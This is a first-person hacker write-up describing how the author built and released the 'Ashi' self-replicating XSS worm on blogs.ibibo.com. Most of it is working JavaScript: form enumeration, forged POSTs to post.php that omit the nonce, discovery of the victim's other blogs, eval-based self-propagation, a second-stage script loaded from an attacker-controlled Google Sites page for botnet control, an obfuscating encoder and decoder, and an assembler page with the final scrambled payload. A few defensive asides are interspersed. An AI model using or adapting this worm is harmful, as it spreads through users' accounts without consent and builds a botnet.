
"Demystifying The Ashi virus"

Author: "vinnu"

Vulnerability: I found several XSS vulnerabilities in ibibo.com.


Next, I searched for a good point from which to automate the leveraging process.
I found two PHP pages, post.php and new-post.php, which submit my blog posts;
both the title and the content were prone to XSS. So I developed a
script to list the form elements:

javascript:var vin=document.getElementsByTagName("form")[0];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);

The above script retrieves the form elements and their values.
So now i had the script (you have to alter above script a
little to increase the form index to a suitable value to reach
the target form as:

javascript:var vin=document.getElementsByTagName("form")[2];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);

Paste above script in address-bar of the browser when the

"http://blogs.ibibo.com/<your-blog>/wp-admin/"

Page will open. I wrote "Namaste" in title & "Hows the life
there" in content box. It gave me following in a dialogue
box:

post_title=Namaste&content=Hows the life there&tags_input=


&action=post-quickpress-save&quickpress_post_ID=0
&_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/
&save=Save Draft&=Cancel&publish=Publish

It seems like they are checking the referer (_wp_http_referer)
and a nonce (_wpnonce); the nonce was the same every time
I tried to post. (WordPress nonces are tied to the user, the action and a
time window, so seeing the same value on repeated attempts is expected.)
The nonce appears in a page which cannot be directly
XSSed, so I just tried to post the request without the referer
and nonce.

javascript:blog(); function blog(){var nunnu="><scr"+"ipt


language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";quote
="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";var
blpayload="post_title="+quote;alert(nunnu);blpayload+=encodeURIComponent(nunnu);bl
payload+="&content=Jaijeya";blpayload+=encodeURIComponent(nunnu);blpayload+="hor&t
ags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";alert(blpayload);ajaxPSLV("http://blogs.ibibo.co
m/vulnerable/wp-admin/post.php",blpayload);}function ajaxPSLV(url, payload)
{ alert("url:\t"+url+"\npayload:\n"+payload);var xmlhttp; if
(window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest(); }else if
(window.ActiveXObject) {try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
catch (e) { try {xmlhttp = new
ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;}
} } alert("sending");xmlhttp.open("POST", url,
true);xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-
urlencoded");xmlhttp.setRequestHeader("Content-length",
payload.length);alert("sending:\t"+payload.length);xmlhttp.send(payload);alert("se
nt");}alert("done");

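It worked: the blog post was accepted even with the nonce and
referer left empty in the request. The server was therefore not validating
_wpnonce at all. Rejecting every state-changing request whose nonce is missing
or wrong is the check that was absent here, alongside output-encoding of the
stored title and content. But there is a problem.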
The script is appearing on the heading and also I wanted
the script to post a different topic everytime it gets executed
so i introduced the well known following circuit for chosing
one of strings out of a list:

var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];

After assembling it with above script i got the following code:

javascript:blog();
function blog(){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent(nunnu);
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-
admin/post.php",blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
}alert("done");

But i don't want my worm to just post in a hardcoded blog.


It must search for all the blogs of the user and inject
the posts as the above post did.

To do this i have to check hrefs of all the anchors. Because


The blog names are appearing within the page and when we click
on any one the respective blog changes.

javascript:var vin=document.getElementsByTagName("a");var
nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

But there are also several other items along with blogs.
So my virus must identify the blogs out of other objects.
I checked the pattern.

After a careful inspection, I found that the hrefs which


has wp-admin in their href are the references of blogs of
the user. So i developed another script to check and it:

javascript:test();
function test() {
var list="";
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
var intex=0;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
list += address+"\n";intex++;
}}alert(intex+"\n"+list);}

Now, i have got a way to identify the blogs out of other objects
and post the random topics.

By combining these all a beast started to take the shape as:

javascript:trigger();
function trigger() {
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
blog(address);
}}}
function blog(addr){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV(addr,blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
};

But i thought the title was not a good place to inject the code
as it will appear in dashboard. So I placed the code in the argument
of post.php named "content" instead of "post_title".

The variable "nunnu" contains the code for a script which retrieves
the remote javascript file at:

http://sites.google.com/site/urcontrolledsite/ibibo.js

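This is Google's free page-hosting facility
(http://sites.google.com/site).
I uploaded the .js file as an attachment, but it contained nothing
initially.
It was meant for controlling the botnet and commanding it later in
forming the XSS tunnels. It was the second stage of a two-stage botnet
formation.
(Defensive note: a script include pointing at a third-party host inside stored
post content is a clear indicator to search for, and a Content-Security-Policy
that limits script sources and disallows inline script blocks this kind of
second-stage load.)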

Note: The third party free sites are also useful to connect to a botnet if
you do not have any dedicated server. In ur script file at free site like google,
you can place a script that can redirect the requests to ur home computer. This
can
be achieved by using a simplest <script> tag with its "src" attribute defined to
ur
home computer's current IP address. But this makes it necessary to remove such
redirector
scripts or change the IP address everytime you get a new IP address or disconnect.
Otherwise,
the botnet will be orphaned or will end up in chaos.

Now, we have formed a script. But still; it cannot go beyond the


currently
infected blogs.

We need to direct our script to inject itself (whole script) into other
blogs also. This can be achieved by a enclosing whole script into a
string
variable and then using the eval() method.
The eval () method takes a string type argument that holds the code for
execution and executes the code.

For example, if we have some code in a variable vinnu and we want to


execute
it, then we can do it like:

var vinnu = "alert(document.cookie);";


eval(vinnu);

So what we can do now is, we have to equate above all code into a
variable
and then feed this very variable to the "content" variable and eval
the variable as in above script.

I defined a variable named "ashi" and fed it to the "content" in blogs


payload
for posting it to the post.php. And finally called eval();

Note: Check this scenario:

eval(vinnu);alert(vinnu);var vinnu="alert(document.cookie)";

This script will fail. It works normally with the lately defined function, but not
with variables.
The above script will work second time, but will fail for first time, So never use
it:

eval(vinnu);var vinnu="alert(document.cookie)";

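This is because on the first run the declaration "var vinnu" is hoisted but the
assignment has not happened yet, so eval() receives undefined and executes nothing;
a variable must be assigned before it is used (not the case with function
declarations, which are hoisted together with their bodies).
On the second attempt in the same page the variable "vinnu" already holds the value
that was assigned after the eval() call during the first execution.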

Also the alert() method is added just for debugging purpose and it must be removed
in final product.

Therefor It should now look like something:

var ashi='trigger();function trigger(){var vin=.....


....................................................
....................................................
blpayload+=encodeURIComponent(\"><\"+\"sc\"+\"ript
language=javascript>var ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");
blpayload+=encodeURIComponent(nunnu);...............
....................................................

The important part here I want to discus is:

\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \"
Now i have turned whole script into a string variable.
And thats why i have to escape all double and single quotation marks
with a preffixed escape character ( \ ).

Also i have to explicitely define variable "ashi" once again within


the string also. This is necessary. We want the code to regain the
shape
of its parent code once again. And the parent code itself starts with

<script>var ashi = '..........

Also remember not to write <script> or </script> literally anywhere, even
within a string or variable. This is because the browser's HTML parser (not
the JavaScript engine) ends the script element at the first </script> it sees,
even when that text sits inside a JavaScript string.
So always break it into pieces as:

"</sc"+"rip"+"t>"

Now after applying above concepts I got the following code:

javascript:var ashi='trigger();function trigger(){var


vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/urcontrolledsite/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:blog();>Jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"Jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=Jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");blpayload+=encodeURICompo
nent(nunnu);blpayload+=\"hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,blpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-
urlencoded\");xmlhttp.setRequestHeader(\"Content-
length\",payload.length);xmlhttp.send(payload);alert(payload);}';eval(ashi);alert(
"done");

The HTML tags which are appearing within the script are for the
alignment of the Injection Vector of the XSS payload.
The virus is ready. And u can trigger it now from your web-browser's
addressbar while you are already logged in into the blogs.ibibo.com.

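But this virus is still in clear text. So why not apply some scrambling
to it. There are some easy and fast ways to do it (there are also heavier
schemes such as DES or RSA; SHA and base64, often listed with them, are a
one-way hash and an encoding rather than encryption. I used the simplest
approach to save the processing overhead). Note that what follows is
obfuscation, not encryption: the decoder travels with the code, so anyone
holding a copy can reverse it.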

One simplest way to do it by using escape() and its decoder is


unescape(). The escape()
function converts special charecters into their hex form by prefixing
the
hex with a "%" sign. We can use escape multiple times.

The first call will escape special characters such as \$#!~%^&()|"'?><,;:[]{}`
into their hex equivalents (letters, digits and the characters @ * _ + - . /
are left as they are, which is why + . / and _ still appear in the assembled
code below), and a second call to escape will escape the % signs once again.
We can use escape several times. But remember
to unescape the code an equal number of times, as:

vinnu = escape(escape(vinnu));

And similarly unescaping:

vinnu = unescape(unescape(vinnu));

Remember more you'll escape it will increase the size of scramble


everytime.
Now I have a facility to convert all special charecters. But what about
the
character literals. I have to develop a special encoder and decoder for
them.
I don't want to scramble all of the characters, just jumbling some of
them will
be enough.

As a choice for encryption technique, i used the several thousand years


old
technique ... the transformation technique and the script I developed
is

The encoder:

/**
 * Encoder from the write-up: percent-escapes x with escape(), then swaps four
 * characters in the escaped text: "%"->"Q", "i"->"Z", "a"->"J", "t"->"F".
 * Every other character is copied through unchanged.
 *
 * Analyst notes:
 * - This is obfuscation, not encryption: there is no key, only a fixed table.
 * - escape() leaves ASCII letters as they are, so an uppercase Q, Z, J or F
 *   already present in x is emitted unchanged and cannot be told apart from a
 *   substituted one; the author reports "Free" coming back as "tree".
 * - The output shows dense runs of "Q" followed by two hex digits (Q28, Q29,
 *   Q3B) where plain escape() output would show %28, %29, %3B.
 *
 * @param x text to scramble
 * @returns the scrambled text
 */
function z(x) {
x=escape(x); // deprecated global; letters, digits and @*_+-./ stay unescaped
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="%") {
s="Q";
}else if(s=="i"){s="Z"}else if(s=="a"){s="J";}else if(s=="t")
{s="F";}
else{s=x.charAt(i);} // no-op: s already holds this character
r+=s;
}return r; }

The decoder:

/**
 * Decoder matching the write-up's encoder: maps "Q"->"%", "Z"->"i", "J"->"a",
 * "F"->"t" character by character, then runs unescape() on the result.
 *
 * Analyst notes:
 * - Every uppercase Q, Z, J or F in the input is rewritten, including ones
 *   that were literal in the original text, so decoding is not exact for
 *   input that contained those letters.
 * - In the write-up the return value is passed straight to eval(); when
 *   examining a sample, keep the decoded result as text and do not execute it.
 *
 * @param x scrambled text
 * @returns the decoded text
 */
function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) { s=x.charAt(i);
if(s=="Q"){
s="%";
}else if(s=="Z"){s="i";}else if(s=="J"){s="a";}else
if(s=="F"){s="t";}
else{s=x.charAt(i);} // no-op: s already holds this character
r+=s;
}r=unescape(r);return r; // unescape() is a deprecated global; turns %XX back into characters
}

I just replaced"%" with "Q", "i" with "Z", "a" with "J", and "t" with
"F".

Note: There was a bug, it replaced the "Free tibet" to "tree Tibet" because of "F"
<==> "t"
conversion. I noticed it after the infection started. And in the beginning i
couldn't identify
the posts with "tree tibet" topic.

My Apology: It is important and I apologize for this mistake. I support the


Tibetan protest for
Holy Land "The Tibet". This mistake really shook my heart when I first noticed it.

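I've used the encoder only once in this case. And the virus code
contained the scrambled code, a decoder and an eval() call.
(Because the decoder and the eval() call are stored unscrambled in every
infected post, they are a stable string to search stored content for.)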

The decoder code was also inside the scramble and while infecting it
should also
place the unscrambled decoder and eval() function in the body of virus.

Once the code executed it will infect other blogs with decoder and eval
attached
at the end of the scrambled code.

But the decoder has a problem in this case. Once it will go under
scrambling, following
code will be interchanged as shown below:

s="i" to s="Z" making if(s=="Z"){s="i";} to if(s=="Z"){s="Z";}

Similarly for other charecters. And the decoder will fail to decode
properly.
So i interchanged the charecters with their hex equivalents and the
decoder
code was changed as shown below:

/**
 * Same decoder as the plain-letter version, with each character literal
 * written as a hex escape so that the decoder's own source contains none of
 * the letters the encoder substitutes:
 *   "\x51" = "Q", "\x25" = "%", "\x5A" = "Z", "\x69" = "i",
 *   "\x4A" = "J", "\x61" = "a", "\x46" = "F", "\x74" = "t".
 * The mapping applied to x is unchanged: Q->%, Z->i, J->a, F->t, followed by
 * unescape().
 *
 * Analyst note: when searching stored content for this routine, match on both
 * spellings of the literals (plain letters and \xNN escapes).
 *
 * @param x scrambled text
 * @returns the decoded text
 */
function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="\x51") {
s="\x25";
}else if(s=="\x5A") {
s="\x69";
}else if(s=="\x4A") {
s="\x61";
}else if(s=="\x46") {
s="\x74";
}else {
s=x.charAt(i); // no-op: s already holds this character
}r+=s;
}
r=unescape(r);return r; // unescape() is a deprecated global; turns %XX back into characters
}

After combining this decoder to the virul code before undergoing the
scrambling,
the beast acquired the following shape:

var ashi='trigger();function trigger(){var


vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var encodr=\"function y(x){var s=\\"\\",r=\\"\\";for(var
i=0;i<x.length;i++){s=x.charAt(i);if(s==\\"\\x51\\"){s=\\"\\x25\\";}else
if(s==\\"\\x5A\\"){s=\\"\\x69\\";}else if(s==\\"\\x4A\\"){s=\\"\\x61\\";}else
if(s==\\"\\x46\\"){s=\\"\\x74\\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r;}\";var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/cyberspecies/n/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:eval(y(ashi));>jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(y(ashi));\"+encodr+\"<\"+\"/sc\"+\"ript><a \");blpayload+
=encodeURIComponent(nunnu);blpayload+=\"hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,blpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-
urlencoded\");xmlhttp.setRequestHeader(\"Content-
length\",payload.length);xmlhttp.send(payload);}';
Now I have all the assets in my hand and just have to assemble them
all.
So I framed a virul structure provided below:

var ashi='scrambled code';eval(y(ashi));

And for first trigger from address bar:

javascript:var ashi='scrambled code';eval(y(ashi));

Remember, try to use variable and function names short to make virul
code compact.

Now I just need to scramble the code. For this purpose I created a HTML
file
containing the code and encoder and decoder. This file will assemble
the virus
and will provide us the viral code. The HTML code is:

<html>
<head><title>Ashi assmebler by "vinnu"</title>

<script language=javascript>

var ashi='trigger();function trigger(){var


vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var encodr=\"function y(x){var s=\\"\\",r=\\"\\";for(var
i=0;i<x.length;i++){s=x.charAt(i);if(s==\\"\\x51\\"){s=\\"\\x25\\";}else
if(s==\\"\\x5A\\"){s=\\"\\x69\\";}else if(s==\\"\\x4A\\"){s=\\"\\x61\\";}else
if(s==\\"\\x46\\"){s=\\"\\x74\\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r;}\";var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/cyberspecies/n/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:eval(y(ashi));>jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(y(ashi));\"+encodr+\"<\"+\"/sc\"+\"ript><a \");blpayload+
=encodeURIComponent(nunnu);blpayload+=\"hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,blpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-
urlencoded\");xmlhttp.setRequestHeader(\"Content-
length\",payload.length);xmlhttp.send(payload);}';

ashi = z(ashi);
var fuse = ';function y(x){var s=\"\",r=\"\";for(var i=0;i<x.length;i+
+){s=x.charAt(i);if(s==\"Q\"){s=\"%\";}else if(s==\"Z\"){s=\"i\";}else
if(s==\"J\"){s=\"a\";}else if(s==\"F\")
{s=\"t\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert(\"Decoded and executed: \"+y(ashi));';
var assembledAshi = "javascript:var ashi='"+z(ashi)+"'"+fuse;
var vhtml = "<P><PRE>" + assembledAshi+"</PRE></P>";

function z(x) {x=escape(x);var s="",r="";for(var i=0;i<x.length;i+


+){ s=x.charAt(i); if(s=="%"){s="Q";}else if(s=="i"){s="Z"}else if(s=="a")
{s="J";}else if(s=="t"){s="F";}else{s=x.charAt(i);}r+=s;}return r; }
function y(x) {var s="",r="";for(var i=0;i<x.length;i++)
{ s=x.charAt(i); if(s=="Q"){s="%";}else if(s=="Z"){s="i";}else if(s=="J")
{s="a";}else if(s=="F"){s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; }

</script>

</head>
<body>
<H1>The Ashi virus Assembler.</H1>
<HR>
<br>
<div id="viraldiv"><H3> love you nunnu</H3>
The viral Code:<BR><HR>
<script language=javascript>document.write(vhtml);</script>
<HR>
<div>

</body>
</html>

And the final assembled code is:

javascript:var
ashi='FrZggerQ28Q29Q3BfuncFZonQ20FrZggerQ28Q29Q7BvJrQ20vZnQ3DdocumenF.geFElemenFsB
yTJgNJmeQ28Q22JQ22Q29Q3BvJrQ20FoFJlQ3D0Q3BvJrQ20ZndexQ3D0Q3BvJrQ20JddressQ3BforQ28
vJrQ20ZFerQ3D0Q3BZFerQ3CvZn.lengFhQ3BZFer+
+Q29Q7BZfQ28Q28ZndexQ3DvZnQ5BZFerQ5D.href.ZndexOfQ28Q22wp-JdmZnQ22Q29Q29Q21Q3D-
1Q29Q7BJddressQ3DvZnQ5BZFerQ5D.href.subsFrZngQ280Q2CZndex+8Q29+Q22/posF.phpQ22Q3Bb
logQ28JddressQ29Q3BQ7DQ7DQ7DfuncFZonQ20blogQ28JddrQ29Q7BvJrQ20encodrQ3DQ22funcFZon
Q20yQ28xQ29Q7BvJrQ20sQ3DQ5CQ22Q5CQ22Q2CrQ3DQ5CQ22Q5CQ22Q3BforQ28vJrQ20ZQ3D0Q3BZQ3C
x.lengFhQ3BZ+
+Q29Q7BsQ3Dx.chJrAFQ28ZQ29Q3BZfQ28sQ3DQ3DQ5CQ22Q5Cx51Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx25Q
5CQ22Q3BQ7DelseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx5AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx69Q5CQ22Q3BQ7D
elseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx4AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx61Q5CQ22Q3BQ7DelseQ20ZfQ2
8sQ3DQ3DQ5CQ22Q5Cx46Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx74Q5CQ22Q3BQ7DelseQ7BsQ3Dx.chJrAFQ28
ZQ29Q3BQ7Dr+Q3DsQ3BQ7DrQ3DunescJpeQ28rQ29Q3BreFurnQ20rQ3BQ7DQ22Q3BvJrQ20nunnuQ3DQ2
2Q3EQ3CscrQ22+Q22ZpFQ20lJnguJgeQ3DjJvJscrZpFQ22+Q22Q20srcQ3DQ5CQ22hFFpQ3A//sZFes.g
oogle.com/sZFe/cyberspecZes/n/ZbZbo.jsQ5CQ22Q3EQ3C/scrQ22+Q22ZpFQ3EQ3CJQ20hrefQ3DQ
5CQ22Q5CQ22Q20onmouseoverQ3DjJvJscrZpFQ3AevJlQ28yQ28JshZQ29Q29Q3BQ3EjJZjeyJQ3C/JQ3
EQ3CJQ20Q22Q3BvJrQ20noQ3DMJFh.floorQ28MJFh.rJndomQ28Q29*10Q29Q3BvJrQ20quoFeQ3DnewQ
20ArrJyQ2810Q29Q3BquoFeQ5B0Q5DQ3DQ22SJhdZQ20bhJsJQ20sJhdZQ20jJJn...Q22Q3BquoFeQ5B1
Q5DQ3DQ22DonFQ20youQ20FhZnkQ20weQ20cJn...Q22Q3BquoFeQ5B2Q5DQ3DQ22ThJFsQ20FheQ20JFF
ZFude...KeepQ20ZFQ20up.Q22Q3BquoFeQ5B3Q5DQ3DQ22InFellZgenFQ3F..Q22Q3BquoFeQ5B4Q5DQ
3DQ22MJZnQ20koZQ20mJchZneQ20FhodZQ20hJZ...Q22Q3BquoFeQ5B5Q5DQ3DQ22jJZjeyJQ20jZQ21Q
20TheekQ20hJZnnQ20nJQ3F...Q22Q3BquoFeQ5B6Q5DQ3DQ22VeeroQ21Q20TusJJnQ20EhQ20bhZQ20p
JrhZQ20leyJQ22Q3BquoFeQ5B7Q5DQ3DQ22HZmJchJlQ20JQ20heJven...Q22Q3BquoFeQ5B8Q5DQ3DQ2
2FreeQ20TZbeF...Q22Q3BquoFeQ5B9Q5DQ3DQ22PJhJrhZQ21lovelyQ20lJnguJge...Q22Q3BvJrQ20
blpJyloJdQ3DQ22posF_FZFleQ3DQ22+quoFeQ5BnoQ5DQ3BblpJyloJd+Q3DQ22Q26conFenFQ3DjJZje
yJQ3EQ3C/pQ3EQ3C/dZvQ22Q3BblpJyloJd+Q3DencodeURIComponenFQ28Q22Q3EQ3CQ22+Q22scQ22+
Q22rZpFQ20lJnguJgeQ3DjJvJscrZpFQ3EvJrQ20JshZQ3DQ27Q22+JshZ+Q22Q27Q3BevJlQ28yQ28Jsh
